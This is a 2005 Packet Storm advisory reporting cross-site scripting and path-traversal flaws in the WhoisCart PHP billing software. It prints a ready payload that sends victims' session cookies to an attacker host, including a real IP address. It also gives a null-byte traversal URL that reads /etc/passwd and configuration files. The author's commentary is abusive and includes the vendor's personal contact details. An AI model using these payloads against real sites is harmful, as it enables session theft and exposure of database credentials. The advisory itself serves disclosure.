whoiscartInsert.txt

2005-06-23T00:00:00
ID PACKETSTORM:38236
Type packetstorm
Reporter Elzar Stuffenbach
Modified 2005-06-23T00:00:00

Description

                                        
                                            `Subject:  
Saeven.net's WhoisCart (all versions released prior to this disclosure) is vulnerable in  
that it allows an attacker to insert Javascript into user viewed pages, and also to view  
any world readable file on the server hosting the WhoisCart software.  
  
  
Severity:  
Severe; These vulnerabilities can allow an attacker to access literally access any part  
of a system, as plaintext database passwords can be read from the WhoisCart  
configuration, or users' session ID cookies stolen, and used to access user accounts.  
  
  
Preamble:  
(Taken from http://www.whoiscart.net/)  
Able to remember, and apt at making your life easier - Whois.Cart 2.2 is a hosting and  
domains shopping cart and billing management system that will most likely be your best  
friend during your domain hosting and registration business venture. Easily skinned  
using our versatile theme architecture, with support for over a dozen payment portals,  
fourteen different languages, and capable of all billing recurrences; the system is  
quickly becoming the most popular and highest rated script in its class [1]. Coded  
entirely in PHP, we challenge you to find a system faster than ours. Long-ranked in  
Zend's Top 10, and by far the most feature packed software for its price - come and see  
why exactly 3155 users just can't be wrong.  
  
  
Problem:  
The first vulnerability, involving Javascript injection, and ultimately session ID  
extraction, is exploited by utilizing an unsecured user input field.  
  
http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE  
  
Basically, url encode some Javascript, like so:  
  
<body onload=document.forms[0].submit(document.cookie)><form name=form1  
action=http://yourmaliciousdomain.com/somescript></form></body>  
  
turns into:  
  
%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E  
  
Then that url encoded Javascript is inserted at the appropriate location above.  
  
  
Next Problem:  
The next vulnerability involves the plain-text printing of any world readable file on  
the system (including any and all configuration files used to run WhoisCart, store  
session IDs, store plaintext database passwords, etc.).  
  
http://yourdomain.com/whoiscart/?language=../../../../../../../../../../../../../etc/passwd%00  
  
There you have the ability to read any world readable file on the server. The %00 is to  
append a null character, as to avoid getting something like /etc/passwd.php.  
  
  
Workaround:  
Use different software, not written by a 12 year old (no offense to any kids reading  
this, but think about security, for once). The vulnerabilities shown here are indicative  
of a truly inferior software product. The product is not even feature complete. The beta  
that's been in progress for 2 years, can be seen at http://beta.whoiscart.net/admin/,  
barely started. Vulnerabilities like this still exist, and have existed throughout the  
software since its inception. The only fix for this is for Saeven.net to release a new  
product, rewritten from the ground up, or for the consumer to choose a new product  
altogether (yes, there are better ones on the market for the same price, try Google). If  
a software allows the unauthorized viewing of globally readable files, the software has  
already failed, and deserves to be shot down such as this.  
  
  
Vendor Contact:  
saeven.net consulting  
Alexandre Lemaire (registrations@saeven.net)  
1968 Portobello blvd  
Orleans  
Ontario,K4A 4E0  
CA  
Tel. +91.226370256 (If you call, careful you don't get his mom)  
  
  
Disclosure Timeline:  
Vendor Notified: June 21, 2005  
Public Release: June 22, 2005  
  
  
About the Author:  
The author is a software engineer, with an absolute detest for bullshit. Sometimes I  
detest some languages, because they allow punks like this to write shit software, and  
then the dumbass programmer puts up a website, uses the word "innovative", and ends up  
ultimately screwing over a few hundred people, who maintain the personal information of  
thousands of people. Identity theft starts with "companies" such as this. Choose a  
trusted solution. The ability to crunch a few numbers, or execute a few lines of PHP,  
does NOT make something trustworthy. A company with a non-ficticious in-house lawyer is  
a good start, and then a company who knows what the fuck they're doing when it comes to  
software design and implementation is stellar.  
  
It is this type of bullshit I detest, and I advise everyone against using this product,  
for numerous reasons, all founding from the same core element: a product is not to be  
trusted because of a flashy website, or because some kid lies about his age.  
  
  
Conclusion:  
Here is an email, verbatim from Mr. Lemaire:  
<quote>  
From: "S. Alexandre M. Lemaire" <saeven@saeven.net>  
I'll indulge your comments.  
  
The truth is that I don't maintain the work on whois.cart currently. I  
have a staff of 13 people working for me right now, the developments are  
intense and I don't have the time to monitor them as I usually would. They  
package and operate independently from myself. My user community knows well  
(as I post frequent updates in the forums) that I'm currently vested into  
our other project, our helpdesk. We have a user base of 3000+, you aren't  
the only one to submit bug reports - note also that the people that work for  
me, aren't bored teenagers. They are people with M.Scs and PhDs in computer  
science and related fields, who've agreed to partake in the whois.cart  
project on their spare time initially. Your concern for security, is not  
exclusive.  
</quote>  
  
Show me a person with a Masters or PHd in Computer Science that both works in the  
webhosting software industry and writes shit software like this, and I will show you  
shit that smells like roses.  
  
--   
`